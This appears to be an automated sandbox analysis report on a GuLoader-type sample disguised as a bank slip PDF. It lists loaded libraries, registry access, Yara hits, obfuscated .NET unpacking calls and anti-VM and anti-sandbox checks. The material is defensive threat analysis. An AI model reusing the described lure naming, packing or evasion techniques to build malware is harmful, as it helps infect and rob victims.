Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Section loaded: dhcpcsvc.dll	Jump to behavior

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Diathermance.lnk.0.dr

LNK file: ..\..\..\..\Local\Temp\flannelmouthed.fre

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: protobuf-net.pdbSHA256}Lq source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2798827157.0000000036560000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2798827157.0000000036560000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000006.00000002.2768139399.0000000001BD9000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2553285117.00000000032F9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

.NET source code contains method to dynamically call methods (often used by packers)

Source: 6.2.BANK SLIP_TT COPY 2-13-2024_pdf.exe.363f0000.4.raw.unpack, VnWFrsYxwlNaWEQ0a9K.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 6.2.BANK SLIP_TT COPY 2-13-2024_pdf.exe.35255590.3.raw.unpack, QI6Jy4WEhefhjRy8hP9.cs	.Net Code: Type.GetTypeFromHandle(eUOp5DZUGvdM9Wa1LHI.zvEep2Fvcd(16777297)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(eUOp5DZUGvdM9Wa1LHI.zvEep2Fvcd(16777248)),Type.GetTypeFromHandle(eUOp5DZUGvdM9Wa1LHI.zvEep2Fvcd(16777365))})

.NET source code contains potential unpacker

Source: 6.2.BANK SLIP_TT COPY 2-13-2024_pdf.exe.36560000.5.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 6.2.BANK SLIP_TT COPY 2-13-2024_pdf.exe.36560000.5.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 6.2.BANK SLIP_TT COPY 2-13-2024_pdf.exe.36560000.5.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 6.2.BANK SLIP_TT COPY 2-13-2024_pdf.exe.36560000.5.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 6.2.BANK SLIP_TT COPY 2-13-2024_pdf.exe.36560000.5.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 6.2.BANK SLIP_TT COPY 2-13-2024_pdf.exe.363f0000.4.raw.unpack, AssemblyLoader.cs	.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
Source: 6.2.BANK SLIP_TT COPY 2-13-2024_pdf.exe.363f0000.4.raw.unpack, pAQFmMc6ZVaXPl6TtcF.cs	.Net Code: smnaNbDXHF
Source: 6.2.BANK SLIP_TT COPY 2-13-2024_pdf.exe.363f0000.4.raw.unpack, pAQFmMc6ZVaXPl6TtcF.cs	.Net Code: BDC33ew8Pt
Source: 6.2.BANK SLIP_TT COPY 2-13-2024_pdf.exe.363f0000.4.raw.unpack, EDEZXEvklQskEYN8BC.cs	.Net Code: RHguJ2wK9 System.AppDomain.Load(byte[])

Yara detected Costura Assembly Loader

Source: Yara match	File source: 6.2.BANK SLIP_TT COPY 2-13-2024_pdf.exe.340e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2794813210.00000000340E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2794968313.0000000034151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: BANK SLIP_TT COPY 2-13-2024_pdf.exe PID: 6432, type: MEMORYSTR

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe

Code function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

0_2_10001A5D

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 0_2_10002D20 push eax; ret	0_2_10002D4E
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_3_03914784 pushad ; retf	6_3_03914785
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_364AC1BA pushad ; retf	6_2_364AC1BD
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_364B72BE push 0000004Bh; retf	6_2_364B72C7
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_3685071E push 8BFFFFFDh; iretd	6_2_36850725
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_3685DFF0 pushfd ; iretd	6_2_3685DFFC
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36859CD0 push eax; iretd	6_2_36859D2A
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36856CFB pushad ; iretd	6_2_36856CFD
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36859D30 push eax; iretd	6_2_36859D3A
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_368813D8 pushad ; retf	6_2_368813E1
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_368A3563 push es; retf	6_2_368A3569
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36DF7D93 push eax; iretd	6_2_36DF7D95
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_36E5BD7B pushad ; retf	6_2_36E5BD81
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_37C27C83 push edi; ret	6_2_37C27C8A
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_37C27C61 push edi; ret	6_2_37C27C62
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_37C29BD6 push es; ret	6_2_37C29BD7
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_37C27B83 push edi; ret	6_2_37C27B8A
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_37C27BA3 push edi; ret	6_2_37C27BAA
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_37C27BA1 push edi; ret	6_2_37C27BA2

Source: 6.2.BANK SLIP_TT COPY 2-13-2024_pdf.exe.363f0000.4.raw.unpack, VnWFrsYxwlNaWEQ0a9K.cs	High entropy of concatenated method names: 'cRL9R1Zl7gx2q5UY6Mc', 't0XKlyZ0PbK62VU8XWA', 'KkfMJcSBKd', 'vh0ry9Sq2v', 'ugrMH0D0nw', 'Us7MEieXZE', 'prXMFSFxXp', 'HoeMmW56tN', 'XPytlwcNGj', 'jlmYYsPJLK'
Source: 6.2.BANK SLIP_TT COPY 2-13-2024_pdf.exe.363f0000.4.raw.unpack, pAQFmMc6ZVaXPl6TtcF.cs	High entropy of concatenated method names: 'p8v0lnjR7q', 'w2Z00qEixk', 'G5r0QdZiSc', 'B5C0yfiZD9', 'saA0vsR60T', 'oIb0Vb5tUn', 'GVl0hngNpM', 'ArAcmEvGBb', 'Vv20S36oub', 'u1v0uUxwvI'
Source: 6.2.BANK SLIP_TT COPY 2-13-2024_pdf.exe.363f0000.4.raw.unpack, EIvTb8HDK9suOuXc1M.cs	High entropy of concatenated method names: 'YCnFsQyCq', 'AVwmixN6k', 'FWR9fgjGK', 'X6CnNBf5c', 'iKLA9fs0h', 'baMX5kjmO', 'DoNerJsSG', 'q3rrW3a6X', 'W1t1lDAms', 'OyPmbcuv3Pk5SZR7hOC'
Source: 6.2.BANK SLIP_TT COPY 2-13-2024_pdf.exe.363f0000.4.raw.unpack, x7EboKWTufe7qDxf09W.cs	High entropy of concatenated method names: 'xsWYpJqvaJ', 'RHWmV4ZTBsA5POma2fV', 'jOWSP4Zdo4RVlQXv5H1', 'g9LWx4muc8', 'ymdWB5cinB', 's5aWYJm3m0', 'q8oWM2iU86', 'memWcbVo9Y', 'xXxWKTKPyG', 'A1SR7EuSZUkuF8ul3El'
Source: 6.2.BANK SLIP_TT COPY 2-13-2024_pdf.exe.363f0000.4.raw.unpack, EDEZXEvklQskEYN8BC.cs	High entropy of concatenated method names: 'L5woxwcls', 'GQMtYaIqx', 'I81jVt4Gp', 'qwoLg03e4', 'IFmh9ldoU', 'znuSDZuwE', 'RHguJ2wK9', 'Jde6WJsFV', 'k93ZXbL1h', 'UttRfKVNd'
Source: 6.2.BANK SLIP_TT COPY 2-13-2024_pdf.exe.363f0000.4.raw.unpack, kqcIAqcguPVFOinLBMF.cs	High entropy of concatenated method names: 'fRqc3JM2WH', 'hZlcl65HAo', 'ydhc06c3JS', 'JqlcQxKKaS', 'FftcyaBXj2', 'RnOcvqaS6x', 'VYWcVmca6C', 'bdwchggWTg', 'eXscSR8wGT', 'bIscuRN3X7'
Source: 6.2.BANK SLIP_TT COPY 2-13-2024_pdf.exe.35255590.3.raw.unpack, dS8NLBORQCnVypqC83v.cs	High entropy of concatenated method names: 'BCqOXeTmv9', 'U3pOumGsu4', 'fuIOlTMxKk', 'zixOrHaVXa', 'CkiO8lhY9c', 'JySO0WQdTN', 'ltJO5WQVx9', 'GONOW3oATt', 'aOZOZW4wdH', 'GxEptKaimOF2wqBtrf1'
Source: 6.2.BANK SLIP_TT COPY 2-13-2024_pdf.exe.35255590.3.raw.unpack, HXWgqf7QK37HQ0ZpisZ.cs	High entropy of concatenated method names: 'wWc74tJV3d', 'i0M7tjFvsd', 'xmc7D5UyIb', 'DAQ76jgD5d', 'vKc7YmXJBj', 'qfo7BYhLkc', 'Jvm7yiCJ8F', 'hWa7sdSoWA', 'IqU7kwu7n7', 'Jca73Hjm9o'
Source: 6.2.BANK SLIP_TT COPY 2-13-2024_pdf.exe.35255590.3.raw.unpack, Dc4xUxvOwXRXuWZuBqx.cs	High entropy of concatenated method names: 'G1CvmmDfsR', 'iFtvXHTZZE', 'qv9vuYO6aw', 'pAmvl2BZg2', 'NfGvrmE0A6', 'BP0v8pdobr', 'BGPv0hNxQE', 'y9Iv5XC42W', 'uHgvWmqc8U', 'zU2vZv9sUB'
Source: 6.2.BANK SLIP_TT COPY 2-13-2024_pdf.exe.35255590.3.raw.unpack, QI6Jy4WEhefhjRy8hP9.cs	High entropy of concatenated method names: 'gvLhX3oBubUujS9vuYp', 'NLL83koyt6Wvt33yAhj', 'pgfZkkSeMY', 'vh0ry9Sq2v', 'tmJZg4Dl6V', 'bxiZD4WM21', 'IhOZ6o2txi', 'mOyZS55OA6', 'W6sek53ZPM', 'Uu9WcY71tn'
Source: 6.2.BANK SLIP_TT COPY 2-13-2024_pdf.exe.35255590.3.raw.unpack, U3E6RwN5SaPZeZUlErQ.cs	High entropy of concatenated method names: 'yJoNZ7E45S', 'm2sNvL1Jpg', 'CQmNKvbK7F', 'qaeN2NtOP8', 'iMXN1SIOn4', 'hyFNMf9N6a', 'Mk4N9wG0GL', 'jyTNIWn3VI', 'mxXNQrUQrd', 'kRONbW4oVv'
Source: 6.2.BANK SLIP_TT COPY 2-13-2024_pdf.exe.35255590.3.raw.unpack, o8P76yvvHV5KpUNsml7.cs	High entropy of concatenated method names: 'ogOQ0NcqVg', 'SAhQ5DjcbE', 'vjdQW9CUnK', 'kRLQZbCtQg', 'WEjQvXwYeL', 'QGfQKts7GH', 'JRuQ2fHKGZ', 'hT4vqP4jUa', 'dtRQ1ee6MW', 'CoWQMovtgf'
Source: 6.2.BANK SLIP_TT COPY 2-13-2024_pdf.exe.35255590.3.raw.unpack, BYp4U2Oe5wBDI4goG2T.cs	High entropy of concatenated method names: 'SAkbTlwEevfVN7OfceR', 'firsqowOpF5u7MyABPY', 'lC52Q4wnWMdK6pAtMIY', 'lI2Dh7wfSbAAVvtZHvc', 'IfrcE44OyD', 'eMvcO4ZytH', 'tptcceFFV9', 'QObcnPQgnZ', 'lJ8cfe8ReD', 'IekcCYmCMn'
Source: 6.2.BANK SLIP_TT COPY 2-13-2024_pdf.exe.35255590.3.raw.unpack, dSjLwOOBq5S8xcIDmvy.cs	High entropy of concatenated method names: 'CULufKTteJhl0RuNSew', 'oQVjUkTghxn2qQENTbW', 'Dispose', 'ToString', 'DXcMKrT6ieWNGruyEyf', 'jOEugUTStIEMcl8gjMd', 'QpGiTQhrZpHBs0vbm5Q', 'ssBPNmh8GL8a08qPsUB', 'SFcQmw7yx2', 'gl1QXQWNFG'
Source: 6.2.BANK SLIP_TT COPY 2-13-2024_pdf.exe.35255590.3.raw.unpack, cOa8qNtY5ahAXGWQgN.cs	High entropy of concatenated method names: 'mxADtipSP', 'eS364pa0w', 'LJ9Sp5Wfx', 'me6ahOsMX', 'pV9FcqTsZ', 'C5KqE8v3J', 'q1eiJDFX0', 'uZ0Onrt3u2', 'oQATxfFEE', 'yqoVgFGZX'
Source: 6.2.BANK SLIP_TT COPY 2-13-2024_pdf.exe.35255590.3.raw.unpack, uC0hRMPfPBtRWtAg1mn.cs	High entropy of concatenated method names: 'bXlPP3Ncc7', 'TYjP7Ktb1S', 'yu2PNpEHJA', 'oVMPjQKEyI', 'DE0PGQ9Xi0', 'RZdPLFYhvs', 'qx9PRtiFVD', 't6hPmRQrOD', 'wyNPXVSrKq', 'aPWPue8diN'

Persistence and Installation Behavior

AI detected suspicious PE digital signature

Source: Initial sample

Joe Sandbox AI: Detected suspicious elements in PE signature: Multiple suspicious indicators: 1) Self-signed certificate (issuer same as subject) which is not trusted by system. 2) Organization 'argusjnes' is unknown/non-corporate and appears suspicious. 3) Email domain 'Bandrol.Net' is not a known corporate domain. 4) Large time gap between compilation date (2016) and certificate creation (2024) suggests possible certificate manipulation. 5) Organization unit name 'Subjektivismens Forlagslederen Delmodigste' appears random/nonsensical. 6) While country code GB is generally trusted, other elements of the certificate chain raise significant red flags. The combination of a self-signed certificate, unknown organization, and suspicious email domain strongly suggests this is not a legitimate business certificate.

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe

File created: C:\Users\user\AppData\Local\Temp\nsgEB09.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: BANK SLIP_TT COPY 2-13-2024_pdf.exe PID: 6432, type: MEMORYSTR

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	API/Special instruction interceptor: Address: 3CB3A3C
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	API/Special instruction interceptor: Address: 2593A3C

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2794968313.0000000034151000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	RDTSC instruction interceptor: First address: 3C71D52 second address: 3C71D52 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F71811995E4h 0x00000006 test bh, ch 0x00000008 test ecx, eax 0x0000000a inc ebp 0x0000000b inc ebx 0x0000000c cmp bl, al 0x0000000e rdtsc
